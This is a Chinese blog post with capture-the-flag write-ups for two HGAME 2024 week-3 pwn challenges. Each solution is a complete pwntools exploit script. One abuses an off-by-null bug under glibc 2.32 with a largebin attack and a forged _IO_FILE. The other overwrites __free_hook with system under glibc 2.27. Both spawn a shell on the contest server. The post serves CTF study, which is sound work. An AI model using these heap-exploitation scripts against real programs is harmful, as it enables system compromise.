HGAME 2024 WEEK3 PWN

最新推荐文章于 2024-02-23 22:10:02 发布
最新推荐文章于 2024-02-23 22:10:02 发布
阅读量436 收藏 8
点赞数 10
分类专栏: # 每日一“胖“ 文章标签: off by null
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61670993/article/details/136233121
版权

简单记录一下吧,只会做简答题的菜狗

EldenRing3

glibc 2.32 off by null

在这里插入图片描述
house of apple2 一套带走:

from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
context(arch = 'amd64', os = 'linux')
#context(arch = 'i386', os = 'linux')
#context.log_level = 'debug'
io = remote("106.14.57.14", 30188)
#io = process("./vuln")
elf = ELF("./vuln")
libc = elf.libc

def debug():
        gdb.attach(io)
        pause()

sd     = lambda s    : io.send(s)
sda    = lambda s, n : io.sendafter(s, n)
sl     = lambda s    : io.sendline(s)
sla    = lambda s, n : io.sendlineafter(s, n)
rc     = lambda n    : io.recv(n)
rl     = lambda      : io.recvline()
rut    = lambda s    : io.recvuntil(s, drop=True)
ruf    = lambda s    : io.recvuntil(s, drop=False)
addr4  = lambda n    : u32(io.recv(n, timeout=1).ljust(4, b'\x00'))
addr8  = lambda n    : u64(io.recv(n, timeout=1).ljust(8, b'\x00'))
addr32 = lambda s    : u32(io.recvuntil(s, drop=True, timeout=1).ljust(4, b'\x00'))
addr64 = lambda s    : u64(io.recvuntil(s, drop=True, timeout=1).ljust(8, b'\x00'))
byte   = lambda n    : str(n).encode()
info   = lambda s, n : print("\033[31m["+s+" -> "+str(hex(n))+"]\033[0m")
sh     = lambda      : io.interactive()
menu   = b'>'

def add(idx, size):
        sla(menu, b'1')
        sla(b'Index: ', byte(idx))
        sla(b'Size: ', byte(size))

def dele(idx):
        sla(menu, b'2')
        sla(b'Index: ', byte(idx))


def show(idx):
        sla(menu, b'4')
        sla(b'Index: ', byte(idx))

def edit(idx, data):
        sla(menu, b'3')
        sla(b'Index: ', byte(idx))
        sda(b'Content: ', data)

add(8, 0x508)
add(0, 0x510)
add(1, 0x500)
add(2, 0x520)
add(3, 0x500)
dele(2)
add(4, 0x530)

show(2)

#libc_base = addr64(b'\n')
libc_base = addr8(6) - 0x1e4030
info("libc_base", libc_base)

edit(2, b'A'*16)

show(2)
rut(b'A'*16)
heap_base = addr8(6)
info("heap_base", heap_base)

edit(2, p64(libc_base+0x1e4030)*2)

_IO_all_list = libc_base + 0x1e45c0
info("_IO_all_list", _IO_all_list)

dele(0)

pay = p64(libc_base+0x1e4030)*2 + p64(heap_base) + p64(_IO_all_list-0x20)
edit(2, pay)

add(5, 0x550)

chunk_addr = heap_base - 0xa30
info("chunk_addr", chunk_addr)

edit(8, b'A'*0x500 + p32(0xfffff7f5) + b';sh\x00')

fake_io_file = p64(0)*2 + p64(1) + p64(2)
fake_io_file = fake_io_file.ljust(0xa0-0x10, b'\x00') + p64(chunk_addr+0x100) # _wide_data
fake_io_file = fake_io_file.ljust(0xc0-0x10, b'\x00') + p64(0xffffffffffffffff) # _mode
fake_io_file = fake_io_file.ljust(0xd8-0x10, b'\x00') + p64(libc_base+0x1e4f80) # vtable
fake_io_file = fake_io_file.ljust(0x100-0x10 + 0xe0, b'\x00') + p64(chunk_addr+0x200)
fake_io_file = fake_io_file.ljust(0x200-0x10, b'\x00') + p64(0)*13 + p64(libc_base+0x503c0)

edit(0, fake_io_file)


sla(menu, b'5')

#debug()


sh()

mm

glibc 2.27 off by null

在这里插入图片描述
构造 overlapping 劫持 free_hook

from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
context(arch = 'amd64', os = 'linux')
#context(arch = 'i386', os = 'linux')
#context.log_level = 'debug'

io = remote("106.14.57.14", 31809)
#io = process("./vuln")
elf = ELF("./vuln")
libc = elf.libc

def debug():
        gdb.attach(io)
        pause()

sd     = lambda s    : io.send(s)
sda    = lambda s, n : io.sendafter(s, n)
sl     = lambda s    : io.sendline(s)
sla    = lambda s, n : io.sendlineafter(s, n)
rc     = lambda n    : io.recv(n)
rl     = lambda      : io.recvline()
rut    = lambda s    : io.recvuntil(s, drop=True)
ruf    = lambda s    : io.recvuntil(s, drop=False)
addr4  = lambda n    : u32(io.recv(n, timeout=1).ljust(4, b'\x00'))
addr8  = lambda n    : u64(io.recv(n, timeout=1).ljust(8, b'\x00'))
addr32 = lambda s    : u32(io.recvuntil(s, drop=True, timeout=1).ljust(4, b'\x00'))
addr64 = lambda s    : u64(io.recvuntil(s, drop=True, timeout=1).ljust(8, b'\x00'))
byte   = lambda n    : str(n).encode()
info   = lambda s, n : print("\033[31m["+s+" -> "+str(hex(n))+"]\033[0m")
sh     = lambda      : io.interactive()
menu   = b'Your choice:'

def add(idx, size, data):
        sla(menu, b'1')
        sla(b'Index: ', byte(idx))
        sla(b'Size: ', byte(size))
        sda(b'Content: ', data)

def dele(idx):
        sla(menu, b'3')
        sla(b'Index: ', byte(idx))


def show(idx):
        sla(menu, b'2')
        sla(b'Index: ', byte(idx))


for i in range(7):
        add(i, 0xf8, b'A')

add(7,  0xf8, b'A')
add(8,  0x20, b'B')
add(9,  0x20, b'B')
add(10, 0xf8, b'A')
add(11, 0x20, b'C')

for i in range(7):
        dele(i)

dele(7)
dele(9)

add(9, 0x28, b'A'*0x20 + p64(0xf0+0x10+0x30+0x30))
dele(10)

for i in range(7):
        add(i, 0xf8, b'A')

add(7, 0xf8, b'A')

show(8)

libc_base = addr8(6) - 0x3ebca0
info("libc_base", libc_base)

free_hook = libc_base + 0x3ed8e8
system = libc_base + 0x4f420

info("free_hook", free_hook)
info("system", system)

dele(11)
dele(9)

add(12, 0x38, b'A'*0x28 + p64(0x31) + p64(free_hook))

#dele(12)

add(14, 0x20, b'/bin/sh\x00')
add(15, 0x20, p64(system))

dele(14)
#debug()
sh()
XiaozaYa
关注
  • 10
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础题目也就不是太难为人,看成数据处理的考点也做的出来...
hgame:Haskell 游戏引擎
05-30
3. **数据结构与算法**:游戏引擎中涉及到大量的数据处理,如碰撞检测、物理模拟、图形渲染等,都需要高效的数据结构和算法支持。Haskell的类型系统可以帮助开发者在编译时检查错误,避免运行时的问题。 4. **并发...
HGAME 2024 WEEK3 Reverse WP
qq_36612618的博客
02-22 1241
她与VN皆遗憾”
[hgame 2024 week3] crypto/pwn
weixin_52640415的博客
02-23 1001
多组低解密指数攻击,b = [m*t%p%(2^32+1) for t in A] 给出模(2^32+1)的余,libc-2.32 UAF largebinAttack 修改mp_ tcache_bins
HGAME 2024 WEEK 1
Fab1an的博客
02-08 1193
nc 登录上去即可获得flag。
HGAME 2024 WEEK 1 :web ezHTTP
weixin_74790320的博客
02-07 634
然后提示通过那些东西访问页面,User-Agent: 是构造你浏览器访问信息的,所以复制右边那一串替代就好了。这次主要查漏补缺了知识点伪造ip地址还有:X-Real-IP:这种方式。但是本题这里构造这两个都是没有反应的,就有第三种方式。然后要求我们从本地访问,那就是伪造ip。然后我们就可以得到右边有一长串的东西。我们把它base64解码一下看看。第一想法就是Referer伪造。然后构造伪造的Referer。看到这个就知道是文件头伪造。
HGAME 2024 WEEK2 Web方向题解 全
Jay17的博客
02-14 1806
HGAME 2024 WEEK2 Web方向题解 全
HGAME 2024 week wp
NYG694的博客
02-15 1029
2024Hgame题目
HGAME 2024 WEEK1 WP
mumuzi的博客
02-06 1713
基于这一点,我想到如果我选中的图是第一张图或者最后一张图,那么用这张图片去异或其他图片,得到的信息是绝对递增的,不会出现信息个数相同的情况(即假设全为flag{123}选中的为f,再往后异或会出现f^fl = l,f^fla = la……没找到问号,试了一下welcome不对,感觉是数字但是一下子没找到,去搜leet发现字母c没有对应的数字表示,就试了下hgame{welc0me。full还是1对吧,但是如果左边我故意让右边400几次,再发正常的包,多次重复这个步骤,莫名其妙full=0了。
hgame 2024 week1
yzzob的博客
02-17 674
1.请从vidar.club访问这个页面>>Referer: vidar.club2.请通过Mozilla/5.0 (Vidar;VidarOS x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0访问此页面3.请从本地访问这个页面>>
HGAME cdcollector-开源
04-24
【标题】"HGAME cdcollector-开源"是一个针对游戏收藏管理者的开源项目,它扩展了原有的cdcollector系统,特别设计用于管理和记录大量的电子游戏数据,尤其是HGAME(可能指的是成人向游戏)的数据库。这个系统利用...
0hgame:用0h制作的游戏->阅读README
05-01
)2- DO NOT TOUCH BLACK THINGS IF YOU DONT WANT TO START AGAIN3- Try to reach the other side of the window to became the king of the penguins4- Enjoy it. (it is a rule, so if you are not enjoying the ...
3D模型图片查看器(可查看3D程序模型)
11-03
在游戏领域,尤其是Hgame(成人游戏)中,3D模型的创建和展示是至关重要的,因为它们构成了游戏内的角色和环境。 描述中提到的“Hgame图片模型查看工具”表明这个查看器可能专门针对游戏行业内,特别是成人游戏的3D...
磁力链磁力链磁力链.txt
最新发布
07-22
磁力链
“人力资源+大数据+薪酬报告+涨薪调薪”
07-22
人力资源+大数据+薪酬报告+涨薪调薪,在学习、工作生活中,越来越多的事务都会使用到报告,通常情况下,报告的内容含量大、篇幅较长。那么什么样的薪酬报告才是有效的呢?以下是小编精心整理的调薪申请报告,欢迎大家分享。相信老板看到这样的报告,一定会考虑涨薪的哦。
安装graphviz和pygraphviz
07-22
pygraphviz 是一个Python库,它是Graphviz图形可视化软件的Python接口。Graphviz是一个开源的图形可视化软件,广泛用于创建和编辑有向图和无向图。pygraphviz使得Python开发者能够轻松地创建和操作图形,以及执行图形的布局和可视化。 一、pygraphviz的主要功能 创建和编辑图形:pygraphviz允许开发者通过Python代码来创建图形,包括添加节点、边等元素,并且可以编辑这些元素的属性,如颜色、形状、标签等。 图形布局:pygraphviz支持多种图形布局算法,如dot、neato、circo等,开发者可以根据需要选择合适的算法来优化图形的布局。 图形可视化:pygraphviz可以将创建和编辑好的图形保存为图片文件,支持多种图片格式,如PNG、JPEG等,方便开发者进行展示和分享。
BrainF**k Devlopment Toolkit
07-22
BrainF**k Devlopment Toolkit(BFDTK),可用于开发BrainF**k程序。
基于UC3875控制的大功率全桥开关电源设计(提供原理图、PCB图)
07-22
基于UC3875控制的大功率全桥开关电源设计(提供原理图、PCB图) 1、使用UC3875为控制芯片; 2、NCP1253为辅助电源设计,输出12V,给控制芯片供电; 3、UC3845做BOOST升压控制,实现市电整流升压到400V; 4、全桥拓扑设计结构; 5、后级输出同步整流设计; 6、过压硬件保护电路; 7、过流硬件保护电路; 8、提供原理图、PCB图;
堆溢出漏洞利用: EldenRingFinal 中的_hgame2024_off_by_one攻击
本周四的hgame2024官方题解涉及一个Pwn挑战,题目是关于利用堆溢出漏洞实现任意写入并泄露libc库的内存地址,进而获取shell。出题思路主要围绕以下几个关键步骤: 1. **漏洞利用原理**: 题目利用的是off_by_one...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值